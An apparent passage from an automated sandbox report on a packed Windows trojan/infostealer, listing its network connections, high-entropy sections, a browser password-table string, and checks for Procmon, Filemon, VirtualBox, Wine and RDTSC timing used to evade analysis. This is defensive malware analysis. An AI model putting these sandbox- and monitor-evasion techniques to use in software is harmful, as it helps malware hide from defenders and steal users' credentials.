            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49744 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_056C3B3D0_3_056C3B3D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003548000_2_00354800
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003693100_2_00369310
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036BB700_2_0036BB70
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00352BA00_2_00352BA0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0033DCB70_2_0033DCB7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00350CD00_2_00350CD0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00357E500_2_00357E50
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0033CEF50_2_0033CEF5
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00338F200_2_00338F20
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005790630_2_00579063
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003330600_2_00333060
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003370A00_2_003370A0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003700A00_2_003700A0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003360900_2_00336090
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034F0900_2_0034F090
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003689700_2_00368970
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035F9600_2_0035F960
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003391500_2_00339150
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003399400_2_00339940
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004429AA0_2_004429AA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0033B2200_2_0033B220
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00333A600_2_00333A60
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CAF20_2_0040CAF2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F3040_2_0040F304
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036FB700_2_0036FB70
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ACB6C0_2_003ACB6C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00337BB00_2_00337BB0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035A3F00_2_0035A3F0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EEC410_2_004EEC41
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00336C100_2_00336C10
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F3C2A0_2_004F3C2A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F8C3F0_2_004F8C3F
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003344400_2_00334440
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034FC800_2_0034FC80
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00332CC00_2_00332CC0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003365500_2_00336550
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003715B00_2_003715B0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0033ADE00_2_0033ADE0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00616DB50_2_00616DB5
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00339DC00_2_00339DC0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F56340_2_004F5634
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00350EA00_2_00350EA0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0033B6E00_2_0033B6E0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354EE00_2_00354EE0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003687100_2_00368710
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F07D40_2_004F07D4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409FE40_2_00409FE4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036FFD00_2_0036FFD0
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: ZLIB complexity 0.9973442656765676
            Source: file.exeStatic PE information: Section: mfsomwhk ZLIB complexity 0.9946697084481175
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035F960 CoCreateInstance,0_2_0035F960
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.1373752466.00000000056E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056C9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1397120435.00000000056CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: file.exeStatic file information: File size 1843200 > 1048576
            Source: file.exeStatic PE information: Raw size of mfsomwhk is bigger than: 0x100000 < 0x198600

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.330000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mfsomwhk:EW;nugibpud:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mfsomwhk:EW;nugibpud:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x1cc166 should be: 0x1c2376
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: mfsomwhk
            Source: file.exeStatic PE information: section name: nugibpud
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00F52379 pushad ; ret 0_3_00F523AA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D6873 push ebp; mov dword ptr [esp], edx0_2_005D68A0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D6873 push eax; mov dword ptr [esp], edx0_2_005D6926
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D6873 push 6B6F6C00h; mov dword ptr [esp], ebx0_2_005D6943
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D6873 push 50BC9100h; mov dword ptr [esp], edi0_2_005D694B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B5874 push 57690A5Ch; mov dword ptr [esp], edx0_2_005B5881
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579063 push ebp; mov dword ptr [esp], ecx0_2_00579088
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579063 push ebx; mov dword ptr [esp], edi0_2_005790B7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579063 push 2AC6584Bh; mov dword ptr [esp], ebp0_2_005790DE
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579063 push 2995A994h; mov dword ptr [esp], edx0_2_00579125
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00500065 push 4E6EAEB3h; mov dword ptr [esp], esi0_2_00500073
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00500065 push edx; mov dword ptr [esp], ebx0_2_005000A7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E03A push 1B3E7100h; mov dword ptr [esp], edi0_2_0052E048
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00616813 push 6F32F212h; mov dword ptr [esp], eax0_2_0061686D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E0C4 push esi; mov dword ptr [esp], ebp0_2_0056E0E6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E0C4 push 4A483F3Bh; mov dword ptr [esp], esi0_2_0056E109
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AB8E3 push 5015AE16h; mov dword ptr [esp], eax0_2_005AB94E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059189D push 48E7C7B0h; mov dword ptr [esp], esi0_2_005918C6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059189D push 37A6226Dh; mov dword ptr [esp], esi0_2_00591981
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B892 push ecx; mov dword ptr [esp], edx0_2_0059B8B5
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038A0E2 push edx; mov dword ptr [esp], 73FF376Eh0_2_0038A883
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057608C push 6279E0B7h; mov dword ptr [esp], edx0_2_00576094
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057608C push 1C8217AFh; mov dword ptr [esp], ebp0_2_0057610E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057608C push ebp; mov dword ptr [esp], esp0_2_0057611E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057608C push ebx; mov dword ptr [esp], ecx0_2_00576215
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057608C push ebx; mov dword ptr [esp], ecx0_2_0057623D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057608C push esi; mov dword ptr [esp], edx0_2_00576286
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058D0A3 push eax; mov dword ptr [esp], 7DFE6BEFh0_2_0058D11B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058D0A3 push 6CF40D12h; mov dword ptr [esp], ebp0_2_0058D1A1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C0946 push ebx; mov dword ptr [esp], edi0_2_005C096E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00527907 push 5B942C29h; mov dword ptr [esp], edi0_2_00527A7F
            Source: file.exeStatic PE information: section name: entropy: 7.970159978732974
            Source: file.exeStatic PE information: section name: mfsomwhk entropy: 7.952928522417956

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFF49 second address: 4FFF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFF52 second address: 4FFF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A38h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFF6E second address: 4FFF78 instructions: 0x00000000 rdtsc 0x00000002 js 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500105 second address: 500109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500679 second address: 50068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449AEh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5034E4 second address: 5034E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5035DB second address: 5035F5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F45D50449A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 jnp 00007F45D50449A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5035F5 second address: 5035FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5035FD second address: 50360D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50360D second address: 503611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503611 second address: 503617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503617 second address: 50361D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50361D second address: 503632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F45D50449A6h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503632 second address: 503688 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d pop eax 0x0000000e and esi, 0FE93149h 0x00000014 push 00000003h 0x00000016 and ecx, dword ptr [ebp+122D2BD8h] 0x0000001c jmp 00007F45D5047A2Ah 0x00000021 push 00000000h 0x00000023 call 00007F45D5047A2Eh 0x00000028 mov dword ptr [ebp+122D1A29h], edi 0x0000002e pop edx 0x0000002f or dword ptr [ebp+122D17E2h], eax 0x00000035 push 00000003h 0x00000037 mov dx, di 0x0000003a call 00007F45D5047A29h 0x0000003f push ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503688 second address: 50368C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50368C second address: 5036CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F45D5047A2Ch 0x0000000f jl 00007F45D5047A26h 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jns 00007F45D5047A3Ch 0x00000020 mov eax, dword ptr [eax] 0x00000022 jc 00007F45D5047A38h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5036CE second address: 5036D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5036D2 second address: 5036D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5036D6 second address: 50371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F45D50449AEh 0x0000000f pop eax 0x00000010 and edi, dword ptr [ebp+122D2B20h] 0x00000016 lea ebx, dword ptr [ebp+1244B409h] 0x0000001c adc cx, B7F3h 0x00000021 xchg eax, ebx 0x00000022 jc 00007F45D50449B3h 0x00000028 jmp 00007F45D50449ADh 0x0000002d push eax 0x0000002e pushad 0x0000002f je 00007F45D50449ACh 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5037EB second address: 5037EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5037EF second address: 503859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F45D50449B4h 0x0000000e popad 0x0000000f add dword ptr [esp], 650C7882h 0x00000016 xor si, 924Eh 0x0000001b mov edi, ebx 0x0000001d lea ebx, dword ptr [ebp+1244B412h] 0x00000023 push eax 0x00000024 pushad 0x00000025 jmp 00007F45D50449AAh 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F45D50449B6h 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503859 second address: 50385D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503965 second address: 50396A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50396A second address: 50398C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 70AB3A35h 0x0000000e clc 0x0000000f lea ebx, dword ptr [ebp+1244B41Dh] 0x00000015 mov edx, eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F45D5047A2Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50398C second address: 503990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524814 second address: 524818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA231 second address: 4FA236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA236 second address: 4FA24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A30h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA24C second address: 4FA250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5228CE second address: 5228D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522C36 second address: 522C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522C3A second address: 522C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522C3E second address: 522C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52377A second address: 523791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F45D5047A2Ah 0x0000000a jc 00007F45D5047A26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51ADB6 second address: 51ADBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51ADBF second address: 51ADCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F45D5047A4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51ADCE second address: 51ADD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51ADD2 second address: 51ADE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
